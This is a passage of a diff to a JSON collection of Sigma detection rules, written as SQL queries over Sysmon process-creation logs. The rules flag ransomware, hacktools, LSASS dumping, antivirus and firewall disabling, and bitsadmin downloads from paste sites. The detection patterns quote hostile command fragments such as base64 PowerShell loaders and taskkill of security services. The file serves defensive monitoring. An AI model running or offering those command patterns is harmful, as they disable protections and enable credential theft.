AND NOT (Image LIKE '%\\\\conhost.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE 
'%\\\\Temporary Internet Files\\\\Content.Outlook\\\\%' ESCAPE '\\')" ], - "filename": "proc_creation_win_dns_susp_child_process.yml" + "filename": "proc_creation_win_office_outlook_execution_from_temp.yml" }, { - "title": "Potential BlackByte Ransomware Activity", - "id": "999e8307-a775-4d5f-addc-4855632335be", - "status": "test", - "description": "Detects command line patterns used by BlackByte ransomware in different operations", + "title": "Suspicious Hacktool Execution - PE Metadata", + "id": "37c1333a-a0db-48be-b64b-7393b2386e3b", + "status": "experimental", + "description": "Detects the execution of different Windows based hacktools via PE metadata (company, product, etc.) even if the files have been renamed", "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' AND CommandLine LIKE '% -single %' ESCAPE '\\') OR (CommandLine LIKE '%del C:\\\\Windows\\\\System32\\\\Taskmgr.exe%' ESCAPE '\\' OR CommandLine LIKE '%;Set-Service -StartupType Disabled $%' ESCAPE '\\' OR CommandLine LIKE '%powershell -command \"$x =[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String(%' ESCAPE '\\' OR CommandLine LIKE '% do start wordpad.exe /p %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Company = 'Cube0x0')" ], - "filename": "proc_creation_win_malware_blackbyte_ransomware.yml" + "filename": "proc_creation_win_hktl_execution_via_pe_metadata.yml" }, { - "title": "Potential Suspicious Windows Feature Enabled - ProcCreation", - "id": "c740d4cf-a1e9-41de-bb16-8a46a4f57918", - "status": "experimental", - "description": "Detects usage of the built-in PowerShell cmdlet \"Enable-WindowsOptionalFeature\" used as a Deployment Image Servicing and Management tool.\nSimilar to 
DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Dropping Of Password Filter DLL", + "id": "b7966f4a-b333-455b-8370-8ca53c229762", + "status": "test", + "description": "Detects dropping of dll files in system32 that may be used to retrieve user credentials from LSASS", + "author": "Sreeman", "tags": [ - "attack.defense_evasion" + "attack.credential_access", + "attack.t1556.002" ], "falsepositives": [ - "Legitimate usage of the features listed in the rule." + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%Enable-WindowsOptionalFeature%' ESCAPE '\\' AND CommandLine LIKE '%-Online%' ESCAPE '\\' AND CommandLine LIKE '%-FeatureName%' ESCAPE '\\' AND (CommandLine LIKE '%TelnetServer%' ESCAPE '\\' OR CommandLine LIKE '%Internet-Explorer-Optional-amd64%' ESCAPE '\\' OR CommandLine LIKE '%TFTP%' ESCAPE '\\' OR CommandLine LIKE '%SMB1Protocol%' ESCAPE '\\' OR CommandLine LIKE '%Client-ProjFS%' ESCAPE '\\' OR CommandLine LIKE '%Microsoft-Windows-Subsystem-Linux%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\Lsa%' ESCAPE '\\' AND CommandLine LIKE '%scecli\\\\0%' ESCAPE '\\' AND CommandLine LIKE '%reg add%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_enable_susp_windows_optional_feature.yml" + "filename": "proc_creation_win_reg_credential_access_via_password_filter.yml" }, { - "title": "Suspicious WindowsTerminal Child Processes", - "id": "8de89e52-f6e1-4b5b-afd1-41ecfa300d48", - "status": "experimental", - "description": "Detects suspicious children spawned via the Windows Terminal application which could be a sign of persistence via WindowsTerminal (see references 
section)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Exploiting SetupComplete.cmd CVE-2019-1378", + "id": "1c373b6d-76ce-4553-997d-8c1da9a6b5f5", + "status": "test", + "description": "Detects exploitation attempt of privilege escalation vulnerability via SetupComplete.cmd and PartnerSetupComplete.cmd described in CVE-2019-1378", + "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", "tags": [ + "attack.privilege_escalation", + "attack.t1068", "attack.execution", - "attack.persistence" + "attack.t1059.003", + "attack.t1574", + "cve.2019.1378" ], "falsepositives": [ - "Other legitimate \"Windows Terminal\" profiles" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\WindowsTerminal.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wt.exe' ESCAPE '\\') AND ((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\csc.exe' ESCAPE '\\') OR (Image LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\') OR (CommandLine LIKE '% iex %' ESCAPE '\\' OR CommandLine LIKE '% icm%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-%' ESCAPE '\\' OR CommandLine LIKE '%Import-Module %' ESCAPE '\\' OR CommandLine LIKE '%ipmo %' ESCAPE '\\' OR CommandLine LIKE '%DownloadString(%' ESCAPE '\\' OR CommandLine LIKE '% /c %' ESCAPE '\\' OR CommandLine LIKE '% /k %' ESCAPE '\\' OR CommandLine LIKE '% /r %' ESCAPE '\\'))) AND NOT ((CommandLine LIKE '%Import-Module%' ESCAPE '\\' AND CommandLine LIKE 
'%Microsoft.VisualStudio.DevShell.dll%' ESCAPE '\\' AND CommandLine LIKE '%Enter-VsDevShell%' ESCAPE '\\') OR (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Packages\\\\Microsoft.WindowsTerminal\\_%' ESCAPE '\\' AND CommandLine LIKE '%\\\\LocalState\\\\settings.json%' ESCAPE '\\') OR (CommandLine LIKE '%C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Common7\\\\Tools\\\\VsDevCmd.bat%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentCommandLine LIKE '%\\\\cmd.exe%' ESCAPE '\\' AND ParentCommandLine LIKE '%/c%' ESCAPE '\\' AND ParentCommandLine LIKE '%C:\\\\Windows\\\\Setup\\\\Scripts\\\\%' ESCAPE '\\' AND (ParentCommandLine LIKE '%SetupComplete.cmd' ESCAPE '\\' OR ParentCommandLine LIKE '%PartnerSetupComplete.cmd' ESCAPE '\\')) AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\Setup\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_windows_terminal_susp_children.yml" + "filename": "proc_creation_win_exploit_cve_2019_1378.yml" }, { - "title": "Suspicious HWP Sub Processes", - "id": "023394c4-29d5-46ab-92b8-6a534c6f447b", + "title": "Potential RDP Tunneling Via SSH Plink", + "id": "f38ce0b9-5e97-4b47-a211-7dc8d8b871da", "status": "test", - "description": "Detects suspicious Hangul Word Processor (Hanword) sub processes that could indicate an exploitation", + "description": "Execution of plink to perform data exfiltration and tunneling", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.initial_access", - "attack.t1566.001", - "attack.execution", - "attack.t1203", - "attack.t1059.003", - "attack.g0032" + "attack.command_and_control", + "attack.t1572" ], "falsepositives": [ - "Unknown" + "Administrative activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE 
(EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\Hwp.exe' ESCAPE '\\' AND Image LIKE '%\\\\gbb.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\plink.exe' ESCAPE '\\' AND CommandLine LIKE '%:127.0.0.1:3389%' ESCAPE '\\') OR (Image LIKE '%\\\\plink.exe' ESCAPE '\\' AND CommandLine LIKE '%:3389%' ESCAPE '\\' AND (CommandLine LIKE '% -P 443%' ESCAPE '\\' OR CommandLine LIKE '% -P 22%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_hwp_exploits.yml" + "filename": "proc_creation_win_plink_susp_tunneling.yml" }, { - "title": "Scheduled Task Executing Powershell Encoded Payload from Registry", - "id": "c4eeeeae-89f4-43a7-8b48-8d1bdfa66c78", + "title": "Suspicious Scheduled Task Creation Involving Temp Folder", + "id": "39019a4e-317f-4ce3-ae63-309a8c6b53c5", "status": "test", - "description": "Detects the creation of a schtask that executes a base64 encoded payload stored in the Windows Registry using PowerShell.", - "author": "pH-T (Nextron Systems), @Kostastsale, @TheDFIRReport", + "description": "Detects the creation of scheduled tasks that involves a temporary folder and runs only once", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.execution", "attack.persistence", - "attack.t1053.005", - "attack.t1059.001" - ], - "falsepositives": [ - "Unlikely" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '%/Create%' ESCAPE '\\' AND CommandLine LIKE '%FromBase64String%' ESCAPE '\\' AND CommandLine LIKE '%Get-ItemProperty%' ESCAPE '\\' AND (CommandLine LIKE '%HKCU:%' ESCAPE '\\' OR CommandLine LIKE '%HKLM:%' ESCAPE '\\' OR CommandLine LIKE '%registry::%' ESCAPE '\\' OR CommandLine LIKE '%HKEY\\_%' ESCAPE '\\')))" + 
"attack.t1053.005" ], - "filename": "proc_creation_win_schtasks_reg_loader.yml" - }, - { - "title": "HackTool - PCHunter Execution", - "id": "fca949cc-79ca-446e-8064-01aa7e52ece5", - "status": "experimental", - "description": "Detects suspicious use of PCHunter, a tool like Process Hacker to view and manipulate processes, kernel options and other low level stuff", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", "falsepositives": [ - "Unlikely" + "Administrative activity", + "Software installation" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\PCHunter64.exe' ESCAPE '\\' OR Image LIKE '%\\\\PCHunter32.exe' ESCAPE '\\') OR OriginalFileName = 'PCHunter.exe' OR Description = 'Epoolsoft Windows Information View Tools' OR (Hashes LIKE '%SHA1=5F1CBC3D99558307BC1250D084FA968521482025%' ESCAPE '\\' OR Hashes LIKE '%MD5=987B65CD9B9F4E9A1AFD8F8B48CF64A7%' ESCAPE '\\' OR Hashes LIKE '%SHA256=2B214BDDAAB130C274DE6204AF6DBA5AEEC7433DA99AA950022FA306421A6D32%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=444D210CEA1FF8112F256A4997EED7FF%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3FB89787CB97D902780DA080545584D97FB1C2EB%' ESCAPE '\\' OR Hashes LIKE '%MD5=228DD0C2E6287547E26FFBD973A40F14%' ESCAPE '\\' OR Hashes LIKE '%SHA256=55F041BF4E78E9BFA6D4EE68BE40E496CE3A1353E1CA4306598589E19802522C%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0479F44DF47CFA2EF1CCC4416A538663%' ESCAPE '\\') OR md5 IN ('228dd0c2e6287547e26ffbd973a40f14', '987b65cd9b9f4e9a1afd8f8b48cf64a7') OR sha1 IN ('5f1cbc3d99558307bc1250d084fa968521482025', '3fb89787cb97d902780da080545584d97fb1c2eb') OR sha256 IN ('2b214bddaab130c274de6204af6dba5aeec7433da99aa950022fa306421a6d32', '55f041bf4e78e9bfa6d4ee68be40e496ce3a1353e1ca4306598589e19802522c') OR Imphash IN ('444d210cea1ff8112f256a4997eed7ff', '0479f44df47cfa2ef1ccc4416a538663')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 
'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /create %' ESCAPE '\\' AND CommandLine LIKE '% /sc once %' ESCAPE '\\' AND CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_pchunter.yml" + "filename": "proc_creation_win_schtasks_creation_temp_folder.yml" }, { - "title": "Taskkill Symantec Endpoint Protection", - "id": "4a6713f6-3331-11ed-a261-0242ac120002", - "status": "experimental", - "description": "Detects one of the possible scenarios for disabling Symantec Endpoint Protection.\nSymantec Endpoint Protection antivirus software services incorrectly implement the protected service mechanism.\nAs a result, the NT AUTHORITY/SYSTEM user can execute the taskkill /im command several times ccSvcHst.exe /f, thereby killing the process belonging to the service, and thus shutting down the service.\n", - "author": "Ilya Krestinichev, Florian Roth (Nextron Systems)", + "title": "Firewall Disabled via Netsh.EXE", + "id": "57c4bf16-227f-4394-8ec7-1b745ee061c3", + "status": "test", + "description": "Detects netsh commands that turns off the Windows firewall", + "author": "Fatih Sirin", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1562.004", + "attack.s0108" ], "falsepositives": [ - "Unknown" + "Legitimate administration activity" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%taskkill%' ESCAPE '\\' AND CommandLine LIKE '% /F %' ESCAPE '\\' AND CommandLine LIKE '% /IM %' ESCAPE '\\' AND CommandLine LIKE '%ccSvcHst.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND ((CommandLine LIKE '%firewall%' ESCAPE '\\' AND CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%opmode%' ESCAPE 
'\\' AND CommandLine LIKE '%disable%' ESCAPE '\\') OR (CommandLine LIKE '%advfirewall%' ESCAPE '\\' AND CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%state%' ESCAPE '\\' AND CommandLine LIKE '%off%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_taskkill_sep.yml" + "filename": "proc_creation_win_netsh_fw_disable.yml" }, { - "title": "Suspicious Download From File-Sharing Website Via Bitsadmin", - "id": "8518ed3d-f7c9-4601-a26c-f361a4256a0c", - "status": "experimental", - "description": "Detects usage of bitsadmin downloading a file from a suspicious domain", + "title": "Suspicious Calculator Usage", + "id": "737e618a-a410-49b5-bec3-9e55ff7fbc15", + "status": "test", + "description": "Detects suspicious use of 'calc.exe' with command line parameters or in a suspicious directory, which is likely caused by some PoC or detection evasion", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.t1197", - "attack.s0190", - "attack.t1036.003" + "attack.t1036" ], "falsepositives": [ - "Some legitimate apps use this, but limited." 
+ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%.ghostbin.co/%' ESCAPE '\\' OR CommandLine LIKE '%.hastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%.paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%anonfiles.com%' ESCAPE '\\' OR CommandLine LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR CommandLine LIKE '%ddns.net%' ESCAPE '\\' OR CommandLine LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%mediafire.com%' ESCAPE '\\' OR CommandLine LIKE '%mega.nz%' ESCAPE '\\' OR CommandLine LIKE '%paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.pl%' ESCAPE '\\' OR CommandLine LIKE '%pastetext.net%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.com%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.net%' ESCAPE '\\' OR CommandLine LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%send.exploit.in%' ESCAPE '\\' OR CommandLine LIKE '%sendspace.com%' ESCAPE '\\' OR CommandLine LIKE '%storage.googleapis.com%' ESCAPE '\\' OR CommandLine LIKE '%transfer.sh%' ESCAPE '\\' OR CommandLine LIKE '%ufile.io%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%\\\\calc.exe %' ESCAPE '\\' OR (Image LIKE '%\\\\calc.exe' ESCAPE '\\' AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_bitsadmin_download_file_sharing_domains.yml" + "filename": "proc_creation_win_susp_calc.yml" }, { - "title": "Abused Debug 
Privilege by Arbitrary Parent Processes", - "id": "d522eca2-2973-4391-a3e0-ef0374321dae", - "status": "test", - "description": "Detection of unusual child processes by different system processes", - "author": "Semanur Guneysu @semanurtg, oscd.community", + "title": "Windows Share Mount Via Net.EXE", + "id": "f117933c-980c-4f78-b384-e3d838111165", + "status": "experimental", + "description": "Detects when a share is mounted using the \"net.exe\" utility", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1548" + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ - "Unknown" + "Legitimate activity by administrators and scripts" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((ParentImage LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\lsass.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\csrss.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\smss.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wininit.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\searchindexer.exe' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll', 'Cmd.Exe'))) AND NOT (CommandLine LIKE '% route %' ESCAPE '\\' AND CommandLine LIKE '% ADD %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '% use %' ESCAPE '\\' OR CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\'))" ], - "filename": 
"proc_creation_win_susp_abusing_debug_privilege.yml" + "filename": "proc_creation_win_net_use_mount_share.yml" }, { - "title": "HackTool - HandleKatz LSASS Dumper Execution", - "id": "ca621ba5-54ab-4035-9942-d378e6fcde3c", - "status": "experimental", - "description": "Detects the use of HandleKatz, a tool that demonstrates the usage of cloned handles to Lsass in order to create an obfuscated memory dump of the same", + "title": "Suspicious Rundll32 Invoking Inline VBScript", + "id": "1cc50f3f-1fc8-4acf-b2e9-6f172e1fdebd", + "status": "test", + "description": "Detects suspicious process related to rundll32 based on command line that invokes inline VBScript as seen being used by UNC2452", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1055" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\loader.exe' ESCAPE '\\' AND CommandLine LIKE '%--pid:%' ESCAPE '\\') OR (Imphash IN ('38d9e015591bbfd4929e0d0f47fa0055', '0e2216679ca6e1094d63322e3412d650') OR Hashes IN ('IMPHASH=38D9E015591BBFD4929E0D0F47FA0055', 'IMPHASH=0E2216679CA6E1094D63322E3412D650')) OR (CommandLine LIKE '%--pid:%' ESCAPE '\\' AND CommandLine LIKE '%--outfile:%' ESCAPE '\\' AND (CommandLine LIKE '%.dmp%' ESCAPE '\\' OR CommandLine LIKE '%lsass%' ESCAPE '\\' OR CommandLine LIKE '%.obf%' ESCAPE '\\' OR CommandLine LIKE '%dump%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND CommandLine LIKE '%Execute%' ESCAPE '\\' AND CommandLine LIKE '%RegRead%' ESCAPE '\\' AND CommandLine LIKE '%window.close%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_handlekatz.yml" + "filename": "proc_creation_win_rundll32_inline_vbs.yml" }, { - "title": "Privilege Escalation via 
Named Pipe Impersonation", - "id": "9bd04a79-dabe-4f1f-a5ff-92430265c96b", + "title": "Suspicious Sysmon as Execution Parent", + "id": "6d1058a4-407e-4f3a-a144-1968c11dc5c3", "status": "experimental", - "description": "Detects a remote file copy attempt to a hidden network share. This may indicate lateral movement or data staging activity.", - "author": "Tim Rauch", - "tags": [ - "attack.lateral_movement", - "attack.t1021" - ], + "description": "Detects suspicious process executions in which Sysmon itself is the parent of a process, which could be a sign of exploitation (e.g. CVE-2022-41120)", + "author": "Florian Roth (Nextron Systems), Tim Shelton (fp werfault)", "falsepositives": [ - "Other programs that cause these patterns (please report)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE')) AND (CommandLine LIKE '%echo%' ESCAPE '\\' AND CommandLine LIKE '%>%' ESCAPE '\\' AND CommandLine LIKE '%\\\\\\\\.\\\\pipe\\\\\\*' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\Sysmon.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\Sysmon64.exe' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\Sysmon.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\' OR Image LIKE 'wevtutil.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\wevtutil.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\WerFault.exe' ESCAPE '\\') OR Image LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\Sysmon.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_priv_escalation_via_named_pipe.yml" + "filename": "proc_creation_win_exploit_cve_2022_41120_sysmon_eop.yml" }, { - 
"title": "Potential Arbitrary Command Execution Using Msdt.EXE", - "id": "258fc8ce-8352-443a-9120-8a11e4857fa5", + "title": "Use of Setres.exe", + "id": "835e75bf-4bfd-47a4-b8a6-b766cac8bcb7", "status": "experimental", - "description": "Detects processes leveraging the \"ms-msdt\" handler or the \"msdt.exe\" binary to execute arbitrary commands as seen in the follina (CVE-2022-30190) vulnerability", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the use of Setres.exe to set the screen resolution and then potentially launch a file named \"choice\" (with any executable extension such as \".cmd\" or \".exe\") from the current execution path", + "author": "@gott_cyber", "tags": [ "attack.defense_evasion", + "attack.t1218", "attack.t1202" ], "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\msdt.exe' ESCAPE '\\' OR OriginalFileName = 'msdt.exe') AND (CommandLine LIKE '%IT\\_BrowseForFile=%' ESCAPE '\\' OR (CommandLine LIKE '% PCWDiagnostic%' ESCAPE '\\' AND (CommandLine LIKE '% /af %' ESCAPE '\\' OR CommandLine LIKE '% -af %' ESCAPE '\\'))))" - ], - "filename": "proc_creation_win_msdt_arbitrary_command_execution.yml" - }, - { - "title": "Suspicious X509Enrollment - Process Creation", - "id": "114de787-4eb2-48cc-abdb-c0b449f93ea4", - "status": "experimental", - "description": "Detect use of X509Enrollment", - "author": "frack113", - "falsepositives": [ - "Legitimate administrative script" + "Legitimate usage of Setres" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%X509Enrollment.CBinaryConverter%' ESCAPE '\\' OR CommandLine LIKE '%884e2002-217d-11da-b2a4-000e7bbb2b09%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage 
LIKE '%\\\\setres.exe' ESCAPE '\\' AND Image LIKE '%\\\\choice' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_x509enrollment.yml" + "filename": "proc_creation_win_lolbin_setres.yml" }, { - "title": "HackTool - Covenant PowerShell Launcher", - "id": "c260b6db-48ba-4b4a-a76f-2f67644e99d2", + "title": "Rundll32 Registered COM Objects", + "id": "f1edd233-30b5-4823-9e6a-c4171b24d316", "status": "test", - "description": "Detects suspicious command lines used in Covenant luanchers", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", + "description": "load malicious registered COM objects", + "author": "frack113", "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1059.001", - "attack.t1564.003" + "attack.privilege_escalation", + "attack.persistence", + "attack.t1546.015" + ], + "falsepositives": [ + "Legitimate use" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%-Sta%' ESCAPE '\\' AND CommandLine LIKE '%-Nop%' ESCAPE '\\' AND CommandLine LIKE '%-Window%' ESCAPE '\\' AND CommandLine LIKE '%Hidden%' ESCAPE '\\' AND (CommandLine LIKE '%-Command%' ESCAPE '\\' OR CommandLine LIKE '%-EncodedCommand%' ESCAPE '\\')) OR (CommandLine LIKE '%sv o (New-Object IO.MemorySteam);sv d %' ESCAPE '\\' OR CommandLine LIKE '%mshta file.hta%' ESCAPE '\\' OR CommandLine LIKE '%GruntHTTP%' ESCAPE '\\' OR CommandLine LIKE '%-EncodedCommand cwB2ACAAbwAgA%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND ((CommandLine LIKE '%-sta %' ESCAPE '\\' OR CommandLine LIKE '%-localserver %' ESCAPE '\\') AND CommandLine LIKE '%{%' ESCAPE '\\' AND CommandLine LIKE '%}%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_covenant.yml" + "filename": 
